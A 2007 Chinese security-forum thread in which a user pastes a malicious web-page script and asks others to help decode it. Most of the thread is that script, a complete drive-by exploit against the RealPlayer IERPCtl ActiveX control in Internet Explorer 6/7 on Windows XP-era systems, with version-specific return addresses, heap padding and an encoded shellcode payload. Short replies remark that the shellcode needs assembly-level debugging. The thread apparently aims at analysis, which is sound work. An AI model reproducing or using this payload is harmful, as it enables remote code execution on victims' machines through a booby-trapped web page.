REAL的漏洞代码，谁给帮我解一下

显示全部楼层 · 发表于 2007-12-16 19:30:43

郁闷呀，看到多次了，至今解不出来

<sCrIpT lAnGuAgE="jAvAsCrIpT"> function RealExploit() { var user = navigator.userAgent.toLowerCase(); if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1) return; if(user.indexOf("nt 5.")==-1) return; VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1"; try { Real = new ActiveXObject(VulObject); }catch(error) { return; } RealVersion = Real.PlayerProperty("PRODUCTVERSION"); Padding = ""; JmpOver = unescape("%75%06%74%04"); for(i=0;i<32*148;i++) Padding += "S"; if(RealVersion.indexOf("6.0.14.") == -1) { if(navigator.userLanguage.toLowerCase() == "zh-cn") ret = unescape("%7f%a5%60"); else if(navigator.userLanguage.toLowerCase() == "en-us") ret = unescape("%4f%71%a4%60"); else return; } else if(RealVersion == "6.0.14.544") ret = unescape("%63%11%08%60"); else if(RealVersion == "6.0.14.550") ret = unescape("%63%11%04%60"); else if(RealVersion == "6.0.14.552") ret = unescape("%79%31%01%60"); else if(RealVersion == "6.0.14.543") ret = unescape("%79%31%09%60"); else if(RealVersion == "6.0.14.536") ret = unescape("%51%11%70%63"); else return; if(RealVersion.indexOf("6.0.10.") != -1) { for(i=0;i<4;i++) Padding = Padding + JmpOver; Padding = Padding + ret; } else if(RealVersion.indexOf("6.0.11.") != -1) { for(i=0;i<6;i++) Padding = Padding + JmpOver; Padding = Padding + ret; } else if(RealVersion.indexOf("6.0.12.") != -1) { for(i=0;i<9;i++) Padding = Padding + JmpOver; Padding = Padding + ret; } else if(RealVersion.indexOf("6.0.14.") != -1) { for(i=0;i<10;i++) Padding = Padding + JmpOver; Padding = Padding + ret; } AdjESP = "LLLL\\XXXXXLD"; Shell = "TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIRJQMF9YIJNXYT4WTJTQKMQT34SPRZMFRMKLCZKKLKRKD89KMBHXQSQQ4F412RNJLNRNOPXRTHP3QOIM88ZRPNMDRXMJKUND4NKDBLQR0DJ028KD4NKK9LKRX10T29GN9WPPBO3KO43LI88PHWPT6XU4LOXL1QPDJLK5QVPKOKU4VZXLYKMV5LZKOJ4UQP0KOPYCXO5VMPX94OOSLZRQM1XOCNO77Q9MML2QMLUKOBFMYLMV0OX9QEJLUNHYSZXOMXMK9ISKOZMUNXHOG3ZM3YYRWRJK98KCGRHLIP1KOQLMQ4M2ZWPXROQBPL2KZMKRTNKS2QXNRY60PMMLKKLKNZ1KOBSSXXJFMQSGOXKSDNKMQDMU7KM74PKPJFK3G6QJTMMMRLUKG1W6BQPNH9QQ2Z8LKKLZN4L40Y81NNJ1JHNXELOSGNORZNNT4NKVQ4KQ4KK61MMVDPT1E6WKORWPRMHLKKLJRMKLKKLZVZXNT5WMW4K5QPR0SJ9Q2KHKM29VNL299FILZMHXB38MLLMKMFTLKJL57OOWTYI2MNHVU8O3VNYTQ8XRQ8KFS8N46J84MN8T6NN5IZORKOIB1YX46OTDFIBQSXKWSIR2LLNTLXNSQHKP1XSRKOO10XCBPNN5E8OURMWUK9Z3VMWUMO9T0NJ4F8R73XKUQHYRNY65K8ES2MNQ6M7QVOTUS9U2NOTTU8OPVI4VR9R2NNN6UNKZSGVLYPBOQSMO2USOYU1MNUSOYSQYS61ZUSMLL0VL67KK3UMKSVJISPWZCVW2MP2MKA"; PayLoad = Padding + AdjESP + Shell; while(PayLoad.length < 0x8000) PayLoad += "YuanGe"; Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0); } RealExploit(); </script>

显示全部楼层 · 发表于 2007-12-16 21:29:59

今天几个解码高手不在。

显示全部楼层 · 发表于 2007-12-16 22:56:13

没人会吗

显示全部楼层 · 发表于 2007-12-17 01:56:31

某shellcode，小聪会，陌大婶去看看吧
http://hi.baidu.com/yicong2007/b ... 22361cbf09e652.html
http://hi.baidu.com/yicong2007/b ... 348f570923029d.html

显示全部楼层 · 发表于 2007-12-17 17:22:02

我有问过他小葱，可是他的回答让我无从下手

轩辕小聪 22:34:54
判断浏览器那个没什么。
至于那段溢出执行代码，已经不是网页解密能够解决的了，只能汇编调试

[可疑文件] REAL的漏洞代码，谁给帮我解一下

浏览过的版块